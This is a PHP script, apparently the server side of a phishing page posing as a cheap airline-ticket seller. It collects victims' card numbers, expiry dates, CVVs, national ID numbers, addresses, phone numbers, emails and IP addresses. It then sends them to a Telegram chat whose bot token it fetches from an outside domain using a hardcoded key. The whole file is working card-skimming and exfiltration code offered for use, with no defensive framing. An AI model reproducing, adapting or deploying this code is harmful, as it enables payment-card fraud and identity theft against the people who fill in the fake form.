<?php
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');


$apiKey = 'ORMgbHsgYlWwfD89PJrsPS';


$apiUrl = "https://aportesnlineacol.store/get_credentials?key={$apiKey}";
$credentialsResponse = file_get_contents($apiUrl);

if (!$credentialsResponse) {
    echo json_encode([
        'status'  => 'error',
        'message' => 'No se pudo obtener la respuesta de la API externa'
    ]);
    exit;
}

$credentials = json_decode($credentialsResponse, true);
if (!is_array($credentials) || !isset($credentials['token'], $credentials['chat_id'])) {
    echo json_encode([
        'status'  => 'error',
        'message' => 'No se pudo obtener credenciales de Telegram'
    ]);
    exit;
}

$telegramBotToken = $credentials['token'];
$telegramChatId   = $credentials['chat_id'];


$data      = json_decode(file_get_contents('php://input'), true);
$ipAddress = $_SERVER['REMOTE_ADDR'] ?? 'N/A';

if (!$data) {
    echo json_encode([
        'status'  => 'error',
        'message' => 'Datos no recibidos'
    ]);
    exit;
}


$message  = "🛑 **-777-TiquetesBaratos-777-** 🛑\n\n";
$message .= "🔑 **IP del Dispositivo**: `{$ipAddress}`\n\n";
$message .= "💳 **Detalles de la Tarjeta** 💳\n";
$message .= "🔢 **Número de Tarjeta**: `{$data['cardNumber']}`\n";
$message .= "📅 **Fecha de Expiración**: `{$data['expMonth']}/{$data['expYear']}`\n";
$message .= "🔒 **CVV**: `{$data['cvv']}`\n";
$message .= "💳 **Cuotas**: `{$data['cuotas']}`\n\n";

if (!empty($data['bank'])) {
    $message .= "🏦 **Banco**: `{$data['bank']}`\n";
}
if (!empty($data['type'])) {
    $message .= "💳 **Tipo de Tarjeta**: `{$data['type']}`\n\n";
}

$message .= "👤 **Datos del Propietario** 👤\n";
$message .= "📝 **Nombre**: *{$data['ownerName']}*\n";
$message .= "🆔 **Cédula**: `{$data['cedula']}`\n";
$message .= "📱 **Teléfono**: `{$data['phone']}`\n";
$message .= "🌍 **Ciudad**: `{$data['city']}`\n";
$message .= "🏠 **Dirección**: `{$data['address']}`\n\n";

if (!empty($data['contact'])) {
    $message .= "📞 **Información de Contacto**\n";
    $message .= "☎️ **Teléfono**: `{$data['contact']['telefono']}`\n";
    $message .= "✉️ **Correo**: `{$data['contact']['correo']}`\n\n";
}

$message .= "🔑 **@usuarioinvalidoe** 🔑\n";


$telegramUrl = "https://api.telegram.org/bot{$telegramBotToken}/sendMessage";
$postData    = [
    'chat_id'    => $telegramChatId,
    'text'       => $message,
    'parse_mode' => 'Markdown'
];

// Usamos cURL para enviar la solicitud POST a la API de Telegram
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $telegramUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
$response = curl_exec($ch);
curl_close($ch);

// ====================================================
// 6) Validar la respuesta de Telegram
// ====================================================
if ($response) {
    echo json_encode(['status' => 'success']);
} else {
    echo json_encode([
        'status'  => 'error',
        'message' => 'Error al enviar mensaje a Telegram'
    ]);
}
?>
